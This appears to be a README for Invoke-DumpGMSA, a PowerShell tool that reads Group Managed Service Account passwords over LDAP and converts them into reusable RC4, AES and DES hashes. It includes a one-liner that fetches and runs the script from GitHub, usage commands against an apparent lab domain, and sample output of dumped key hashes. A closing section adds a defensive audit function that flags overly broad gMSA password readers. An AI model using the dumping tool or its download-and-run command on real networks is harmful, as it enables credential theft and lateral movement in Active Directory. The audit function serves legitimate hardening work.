PowerShell port of core functionality from https://github.com/rvazarkar/GMSAPasswordReader.
Reads the password blob from a GMSA account using LDAP, and parses the values into hashes for re-use.
Load into memory
IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-DumpGMSA/refs/heads/main/Invoke-DumpGMSA.ps1' | IEX
Commands
# Search for all GMSA accounts and attempt to parse the password blob
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
# Target a specific account by DistinguishedName
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL" -DN "CN=gmsaDragon,CN=Managed Service Accounts,DC=essos,DC=local"
Example Output
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$
GMSA Account : ESSOS.LOCAL\gmsaDragon$
Password valid until : 10/09/2025 14:54:59
rc4_hmac : 85b952359bee0656b74f4259810f7cad
aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22
aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca
des_cbc_md5 : efa47ab31ae0d92f
Example Output (Lack of permissions)
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as SEVENKINGDOMS\Moe
Found GMSA but no rights to read msDS-ManagedPassword as SEVENKINGDOMS\Moe
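Whether the read succeeds or fails as in the two outputs above depends on which principals are allowed to retrieve each gMSA's password. The following audit is an added example, not part of Invoke-DumpGMSA: the function name `Find-BroadGmsaReader`, the list of "broad" groups, and the sample objects are assumptions constructed for illustration.

```powershell
# Added example (not from the Invoke-DumpGMSA project).
# Lists every principal allowed to retrieve a gMSA password and flags
# readers that match an assumed list of overly broad groups.
function Find-BroadGmsaReader {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [object]$Account,

        # Assumed review list; adjust to local policy.
        [string[]]$BroadPrincipals = @(
            'Domain Computers', 'Domain Users', 'Authenticated Users', 'Everyone'
        )
    )
    process {
        # An empty property means nobody was granted retrieval; skip nulls.
        $readers = @($Account.PrincipalsAllowedToRetrieveManagedPassword |
            Where-Object { $_ })
        foreach ($dn in $readers) {
            # Compare on the leading CN value of the distinguished name.
            $name = if ($dn -match '^CN=([^,]+),') { $Matches[1] } else { $dn }
            [pscustomobject]@{
                GMSA   = $Account.Name
                Reader = $dn
                Broad  = $BroadPrincipals -contains $name
            }
        }
    }
}

# Constructed sample input shaped like Get-ADServiceAccount output.
$sample = @(
    [pscustomobject]@{
        Name = 'gmsaDragon'
        PrincipalsAllowedToRetrieveManagedPassword =
            @('CN=BRAAVOS,CN=Computers,DC=essos,DC=local')
    },
    [pscustomobject]@{
        Name = 'gmsaExample'
        PrincipalsAllowedToRetrieveManagedPassword =
            @('CN=Domain Computers,CN=Users,DC=essos,DC=local')
    }
)
$sample | Find-BroadGmsaReader | Format-Table -AutoSize

# Against a live domain (requires the ActiveDirectory module):
# Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
#     Find-BroadGmsaReader | Where-Object Broad
```

Each reader listed can obtain the same key material shown in the example output, so the list should contain only the hosts that actually run the service.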